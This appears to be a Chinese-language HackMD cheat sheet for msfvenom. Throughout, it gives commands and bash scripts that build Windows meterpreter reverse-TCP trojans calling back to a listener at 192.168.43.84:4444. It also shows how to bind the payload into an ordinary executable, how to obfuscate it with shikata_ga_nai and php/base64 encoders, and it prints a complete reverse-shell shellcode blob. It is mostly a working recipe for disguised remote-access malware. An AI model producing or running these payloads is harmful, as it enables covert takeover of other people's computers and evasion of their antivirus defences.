### 顯示參數 ``` msfvenom -l formats msfvenom -l payloads ``` ### 生成木馬(32bits) ```bash // 生成木馬 msfvenom -p windows/meterpreter_reverse_tcp -f exe -a x86 --platform windows -o ./123.exe lhost=192.168.43.84 lport=4444 ``` ### 生成木馬(64bits) ``` msfvenom -p windows/x64/meterpreter_reverse_tcp -f exe -a x86 --platform windows -o ./123.exe lhost=192.168.43.84 lport=4444 ``` ///////////////////////////////////////////////////////////////////////////////////////////////////////////// ### Bash 創建木馬(32bits) ```bash #!/bin/bash ip=192.168.43.84 port=4444 arch=x86 platform=windows format=exe payload=windows/meterpreter_reverse_tcp out=./test.exe msfvenom -p $payload LHOST=$ip LPORT=$port -f $format -a $arch --platform $platform -o $out ``` ### Bash 創建木馬(64bits) ```bash #!/bin/bash ip=192.168.43.84 port=4444 arch=x64 platform=windows format=exe payload=windows/x64/meterpreter_reverse_tcp out=./test.exe msfvenom -p $payload LHOST=$ip LPORT=$port -f $format -a $arch --platform $platform -o $out ``` //////////////////////////////////////////////////////////////////////////////////////////////////////////// ### 綑綁木馬(32bits) 參數 -x ```bash msfvenom -p windows/meterpreter_reverse_tcp -f exe --platform windows -x ./hello.exe -a x86 -o ./123.exe lhost=192.168.43.84 lport=4444 ``` 我用 dev c++ 生成了一個debug 32 版的 hello.exe 可以 成功 我只寫一個 print hello 它馬上就會關閉,維持運作的應該是 payload 只要關閉 msfconsole 就會失去連接。 版本最好對應一下 綑綁的應用32 就加上 -a x86 (工作管理員可以看見 處理程序 可以看見是否為 32 位應用 ) 實測: 預設綁32應用 不加 -a x86 也可以成功 ### bash 綑綁木馬(64bits ) ```bash ip=192.168.43.84 port=4444 arch=x64 platform=windows format=exe payload=windows/x64/meterpreter_reverse_tcp out=./123.exe bind_target=./hello.exe msfvenom -p $payload LHOST=$ip LPORT=$port -f $format -a $arch --platform $platform -x $bind_target -o $out ``` //////////////////////////////////////////////////////////////////////////////////////////////////////////// ### Enconder ```bash msfvenom -l encoders //-e x86/shikata_ga_nai //-i 3 encoder三次 msfvenom -p windows/meterpreter_reverse_tcp -e x86/shikata_ga_nai -i 3 -f exe -a x86 --platform windows -o ./123.exe lhost=192.168.43.84 lport=4444 //php/base64 混淆 msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.43.84 lport=4444 -o /home/kali/Desktop/shit.php -f raw -e php/base64 ``` ### python 格式的shellcode ```bash msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.43.84 lport=4444 -f py -v myshellcode -b "0x00" ``` ```python shellcode = b"" myshellcode += b"\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48" myshellcode += b"\x8d\x05\xef\xff\xff\xff\x48\xbb\xdd\xee\xd7" myshellcode += b"\xc7\xa5\x4d\x54\x52\x48\x31\x58\x27\x48\x2d" myshellcode += b"\xf8\xff\xff\xff\xe2\xf4\x21\xa6\x54\x23\x55" myshellcode += b"\xa5\x98\x52\xdd\xee\x96\x96\xe4\x1d\x06\x1a" myshellcode += b"\xec\x3c\xb2\x8f\x2e\x1f\x34\x1a\x56\xbc\xcf" myshellcode += b"\x96\xed\xc6\x06\x72\x8b\xa3\xe6\x0e\xed\xc6" myshellcode += b"\x26\x02\x95\xe1\x60\x8d\xef\x05\x65\x92\x71" myshellcode += b"\xd2\xb6\xbb\xa7\x61\x74\x13\x1c\x27\xda\x86" myshellcode += b"\xa4\x8c\xb6\xbf\x8f\xaf\x86\x8f\x2e\x1f\x74" myshellcode += b"\xd9\x9f\xd2\x9f\xc6\x75\x2b\xd5\x2a\xc5\xe5" myshellcode += b"\xd5\xc8\x20\x3f\x54\x52\xdd\x65\x57\x4f\xa5" myshellcode += b"\x4d\x54\x1a\x58\x2e\xa3\xa0\xed\x4c\x84\x16" myshellcode += b"\x56\xae\xf7\x97\x2e\x05\x4c\x1b\xdc\x3e\x34" myshellcode += b"\x91\xed\xb2\x9d\x13\x56\xda\x5f\x8a\x94\x84" myshellcode += b"\x1c\x53\x0b\xa6\xe6\x07\xe4\x8c\x9d\x5f\x71" myshellcode += b"\xaf\xd6\x06\x9d\xad\x21\xa3\x91\xed\x9b\xe3" myshellcode += b"\xad\x08\x6d\x83\xa8\x36\x8f\x83\x2e\x0d\x70" myshellcode += b"\x1b\xdc\x3e\xb1\x86\x2e\x41\x1c\x16\x56\xae" myshellcode += b"\xcb\x8e\xa4\x9d\x15\xd9\xd9\x66\x9f\xc6\x75" myshellcode += b"\x0c\x0c\x13\x85\xb0\x8e\x9d\xe4\x15\x15\x0b" myshellcode += b"\x9c\xb4\x9f\x44\x49\x6d\x15\x00\x22\x0e\x8f" myshellcode += b"\x86\xfc\x17\x1c\xd9\xcf\x07\x9c\x38\x5a\xb2" myshellcode += b"\x09\x1b\x63\x99\xa4\xf5\xfa\x7e\x66\x52\xdd" myshellcode += b"\xaf\x81\x8e\x2c\xab\x1c\xd3\x31\x4e\xd6\xc7" myshellcode += b"\xa5\x04\xdd\xb7\x94\x52\xd5\xc7\xb4\x11\x94" myshellcode += b"\xfa\xf6\xba\x96\x93\xec\xc4\xb0\x1e\x54\x1f" myshellcode += b"\x96\x7d\xe9\x3a\x72\x55\x22\x3b\x9b\x4e\x4f" myshellcode += b"\x25\x55\x53\xdd\xee\x8e\x86\x1f\x64\xd4\x39" myshellcode += b"\xdd\x11\x02\xad\xaf\x0c\x0a\x02\x8d\xa3\xe6" myshellcode += b"\x0e\xe8\x7c\x94\x1a\x22\x2e\x9f\x4e\x67\x05" myshellcode += b"\xab\x92\x95\x67\x16\x86\x1f\xa7\x5b\x8d\x3d" myshellcode += b"\x11\x02\x8f\x2c\x8a\x3e\x42\x9c\xb6\x9b\x4e" myshellcode += b"\x47\x05\xdd\xab\x9c\x54\x4e\x62\xd1\x2c\xab" myshellcode += b"\x87\x58\x2e\xa3\xcd\xec\xb2\x9a\x27\x38\x06" myshellcode += b"\x44\xc7\xa5\x4d\x1c\xd1\x31\xfe\x9f\x4e\x47" myshellcode += b"\x00\x65\x9b\xb7\xea\x96\x9f\xed\xc4\xad\x13" myshellcode += b"\x67\xec\x0e\x0f\xfa\xb2\x81\xd1\x25\xee\xa9" myshellcode += b"\x92\xed\xce\x90\x72\x83\x67\x21\xad\xe5\x0c" myshellcode += b"\x0d\x3a\xdd\xfe\xd7\xc7\xe4\x15\x1c\xdb\x2f" myshellcode += b"\xa6\xe6\x0e\xe4\xf7\x0c\xf6\x8e\x0b\x28\x12" myshellcode += b"\xed\xc4\x97\x1b\x54\x29\x9a\xf6\x6c\x04\xdd" myshellcode += b"\xa2\x95\x67\x0d\x8f\x2c\xb4\x15\xe8\xdf\x37" myshellcode += b"\x1f\x98\x5a\x98\xd7\xaa\xdd\x93\xff\x9f\xe4" myshellcode += b"\x1a\x0d\x3a\xdd\xae\xd7\xc7\xe4\x15\x3e\x52" myshellcode += b"\x87\xaf\x6d\xcc\x8a\x42\x64\xad\x08\xb9\x8e" myshellcode += b"\x86\x1f\x38\x3a\x1f\xbc\x11\x02\x8e\x5a\x83" myshellcode += b"\xbd\x6e\x22\x11\x28\x8f\xa4\x8e\x1c\x7b\x1b" myshellcode += b"\xa6\x52\x31\xd0\xf9\x15\xad\x3a\xb6\xbd\xc7" myshellcode += b"\xfc\x04\x93\x90\x2d\x5b\x75\x91\x5a\x98\x54" myshellcode += b"\x52" ``` Evasion 免殺模塊: ``` show evasion 待續 ```
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up